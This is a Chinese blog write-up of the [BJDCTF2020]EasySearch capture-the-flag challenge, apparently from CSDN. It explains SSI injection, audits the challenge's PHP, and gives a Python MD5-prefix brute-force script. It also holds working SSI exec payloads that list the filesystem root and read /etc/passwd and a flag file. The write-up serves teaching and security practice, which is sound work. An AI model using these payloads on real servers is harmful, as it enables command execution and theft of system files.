SSI漏洞之[BJDCTF2020]EasySearch1

于 2022-08-17 23:24:33 发布
阅读量247 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTF知识点 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126396210
本文详细介绍了SSI(Server Side Include)注入漏洞的概念、挖掘思路以及利用方法,包括显示服务器环境变量、文件包含、执行服务器程序等功能。通过代码审计示例,揭示了如何利用SSI漏洞,并提供了Python代码来构造payload进行攻击。同时,还展示了如何利用SSI注入获取服务器文件目录及读取特定文件内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点:

ssi漏洞参考:SSI注入漏洞_Hydra.的博客-CSDN博客_ssi注入

,在SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。

SSI挖掘思路

  • 从业务场景来Fuzz,比如获取IP、定位、时间等

  • 识别页面是否包含.stm,.shtm和.shtml后缀

 

①显示服务器端环境变量<#echo>

本文档名称:

<!–#echo var="DOCUMENT_NAME"–>

现在时间:

<!–#echo var="DATE_LOCAL"–>

显示IP地址:

<! #echo var="REMOTE_ADDR"–>

将文本内容直接插入到文档中<#include>

<! #include file="文件名称"–>

<!--#include virtual="index.html" -->

<! #include virtual="文件名称"–>

<!--#include virtual="/www/footer.html" -->

注:file包含文件可以在同一级目录或其子目录中,但不能在上一级目录中,virtual包含文件可以是Web站点上的虚拟目录的完整路径

③显示WEB文档相关信息<#flastmod><#fsize>(如文件制作日期/大小等)

文件最近更新日期:

<! #flastmod file="文件名称"–>

文件的长度:

<!–#fsize file="文件名称"–>

④直接执行服务器上的各种程序<#exec>(如CGI或其他可执行程序)

<!–#exec cmd="文件名称"–>

<!--#exec cmd="cat /etc/passwd"-->

<!–#exec cgi="文件名称"–>

<!--#exec cgi="/cgi-bin/access_log.cgi"–>

将某一外部程序的输出插入到页面中。可插入CGI程序或者是常规应用程序的输入,这取决于使用的参数是cmd还是cgi。

⑤设置SSI信息显示格式<#config>(如文件制作日期/大小显示方式)

⑥高级SSI可设置变量使用if条件语句。

列题:

这代码审计。

扫描得源代码

代码审计 

<?php
	ob_start();

function get_hash(){
	$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
	$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times 
 //mt_rand(min,max)  生成随机数
	$content = uniqid().$random;   
	//生成唯一ID
	return sha1($content); 
}

header("Content-Type: text/html;charset=utf-8"); 
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
    $admin = '6d0bc1';
    if ( $admin == substr(md5($_POST['password']),0,6)) { 
     //是请求参数password的MD5前六位等于6d0bc1,就得到解
        echo "<script>alert('[+] Welcome to manage system')</script>";
        $file_shtml = "public/".get_hash().".shtml";
        $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
        $text = '
        ***
        ***
        <h1>Hello,'.$_POST['username'].'</h1>
        ***
		***';
        fwrite($shtml,$text);
        fclose($shtml);
        ***
		echo "[!] Header  error ...";
    } else {
        echo "<script>alert('[!] Failed')</script>";
        
}else
{
***
}
***
?>

get_hash()是个自定义函数,用来得到一个字符串,用作文件的名字。主函数是这样的:我们传入的$password的md5值需要满足前6个字符是6d0bc1,然后会得到一个字符串(暂定为s),会建立s.shtml文件,$text中含有我们传入的$username,并且会将$text的值写入s.shtml中,而这会导致SSI注入漏洞。

使用python跑出password

import hashlib
for i in range(10000000):
    pwd=str(i)
    pwd = hashlib.md5(bytes(pwd, encoding='utf-8'))
    ch=pwd.hexdigest()
    if ch[0:6]=='6d0bc1':
        print(ch,"-->",i)

6d0bc1153791aa2b4e18b4f344f26ab4 --> 2020666
6d0bc1ec71a9b814677b85e3ac9c3d40 --> 2305004

因为代码审计会对username进行嵌套给shtml文件,所以将ssi漏洞的命令赋值给username

 <!--#exec cmd="ls /"-->

将得到的 shtml 文件打开,就得到文件目录:

在直接构造payload:

 <!--#exec cmd="cat /flag_990c66bf85a09c664f0b6741840499b2"-->

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值